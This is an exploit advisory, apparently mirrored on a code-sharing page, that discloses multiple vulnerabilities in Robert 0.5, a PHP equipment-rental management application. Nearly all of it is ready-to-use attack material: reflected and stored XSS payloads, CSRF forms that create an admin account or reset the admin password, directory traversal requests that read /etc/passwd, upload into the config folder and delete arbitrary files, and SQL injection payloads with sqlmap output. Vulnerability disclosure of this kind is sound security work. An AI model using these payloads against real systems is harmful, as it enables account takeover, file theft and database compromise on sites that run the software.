扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 |
# Exploit Title: Robert 0.5 - Multiple Vulnerabilities XSS, CSRF, Directory traversal & SQLi # Date: 07/06/2017 # Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT # Vendor website :http://robert.polosson.com/ # Download link : https://github.com/RobertManager/robert/archive/master.zip # Live demo : http://robertdemo.polosson.com/ # Version: 0.5 # Tested on: Windows 7 x64 SP1 / Kali Linux Web-application open-source management of equipment park for rental or loan. Written in HTML, PHP, MySQL, CSS and Javascript. Description : Multiple security issues have been found :XSS, CSRF, Directory Traversal, SQLi 1- XSS reflected http://192.168.3.215/robert/index.php?go=infos%22%3E%3Cscript%3Ealert(1)%3C/script%3E param vuln : go script vuln : index.php 2- XSS reflected POST /robert/modals/personnel_list_techniciens.php data : searchingfor=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&searchingwhat=surnom param vuln : searchingfor script vuln : personnel_list_techniciens.php 3- XSS Stored POST /robert/fct/matos_actions.php data: action=addMatos&label=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&ref="><script>alert(1)</script>&categorie=son&sousCateg=0&Qtotale=1&dateAchat=&tarifLoc=1&valRemp=1&externe=0&ownerExt=&remarque=%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E param vuln : label, ref et remarque script vuln : matos_actions.php 4- XSS Stored POST /robert/fct/packs_actions.php data :action=addPack&label=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&ref="><script>alert(4)</script>&categorie=son&detail=undefined&externe=0&remarque=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&detail={"2":1} param vuln : label, ref et remarque script vuln : packs_actions.php 5- XSS stored POST /robert/fct/beneficiaires_actions.php action=modif&id=2&surnom="><script>alert(7)</script>&GUSO=&CS=&prenom="><script>alert(8)</script>&nom="><script>alert(9)</script>&email=&tel=&birthDay=0000-00-00&birthPlace=&habilitations=undefined&categorie=regisseur&SECU=&SIRET=N/A&intermittent=0&adresse=&cp=&ville=&assedic= param vuln : surnom, prenom, nom script vuln : beneficiaires_actions.php 6- XSS stored POST /robert/fct/tekos_actions.php action=addStruct&id=1&label=test%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&NomRS=&type="><script>alert(3)</script>&adresse=test"><script>alert(4)</script>&codePostal=12312&ville="><script>alert(5)</script>&email="><script>alert(6)</script>&tel=&SIRET="><script>alert(8)</script>&remarque=%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E param vuln : label, type, adresse, ville, email, SIRET et remarque script vuln : beneficiaires_actions.php 7- CSRF Create new admin <form action="http://192.168.3.215/robert/fct/user_actions.php" method="POST"> <input type="hidden" name="action" value="create"/> <input type="hidden" name="cMail" value="hacked@hacked.com"/> <input type="hidden" name="cName" value="hacked"/> <input type="hidden" name="cPren" value="hacked"/> <input type="hidden" name="cPass" value="hacked"/> <input type="hidden" name="cLevel" value="7"/> <input type="hidden" name="cTekos" value="0"/> <input type="submit" value="CSRFED This Shit"/> </form> 8- CSRF Change admin password and infos <form action="http://192.168.3.215/robert/fct/user_actions.php" method="POST"> <input type="hidden" name="action" value="modifOwnUser"/> <input type="hidden" name="id" value="1"/> <input type="hidden" name="email" value="hacked"/> <input type="hidden" name="nom" value="hacked"/> <input type="hidden" name="prenom" value="hacked"/> <input type="hidden" name="password" value="hacked"/> <input type="submit" value="CSRFED This Shit"/> </form> 9- Directory traversal on Download fonction ( Read Arbitrary File) http://192.168.3.215/robert/fct/downloader.php?dir=sql&file=../../../../../../etc/passwd param vuln : file script vuln : downloader.php 10- Directory traversal on Upload fonction (Upload file in root path) POST /robert/fct/uploader.php?dataType=tekos&folder=../../config&qqfile=filename.jpg HTTP/1.1 Host: 192.168.3.215 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: */* Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 X-Requested-With: XMLHttpRequest X-File-Name: filename.jpg Content-Type: application/octet-stream Referer: http://192.168.3.215/robert/index.php?go=gens Content-Length: 99550 Cookie: YOURCOOKIE Connection: close ...snip... file data ...snip... param vuln : folder script vuln : uploader.php 11- Directory traversal on Delete fonction (Delete Arbitrary File) POST /robert/fct/plans_actions.php HTTP/1.1 Host: 192.168.3.215 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: */* Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://192.168.3.215/robert/index.php?go=calendrier Content-Length: 42 Cookie:YOURCOOKIE Connection: close action=supprFichier&idPlan=4&file=../../../../tested.txt param vuln : file script vuln : plans_actions.php 11- SQL Injection POST /robert/fct/plans_actions.php HTTP/1.1 Host: 192.168.3.215 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: */* Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://192.168.3.215/robert/index.php?go=calendrier Content-Length: 20 Cookie: YOURCOOKIE Connection: close action=loadPlan&ID=2' POST parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 397 HTTP(s) requests: --- Parameter: ID (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT) Payload: action=loadPlan&ID=2' OR NOT 8111=8111# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: action=loadPlan&ID=2' AND (SELECT 3865 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(3865=3865,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XhTe Type: stacked queries Title: MySQL > 5.0.11 stacked queries (comment) Payload: action=loadPlan&ID=2';SELECT SLEEP(5)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: action=loadPlan&ID=2' OR SLEEP(5)-- zwwN --- param vuln : ID script vuln : plans_actions.php ------------------------------------------------------------------------------------------------------------------------------ #### Special Thanks to SC, PC and Mana l'artiste from HTTPCS - Ziwit SecTeam #### ------------------------------------------------------------------------------------------------------------------------------ |
体验盒子
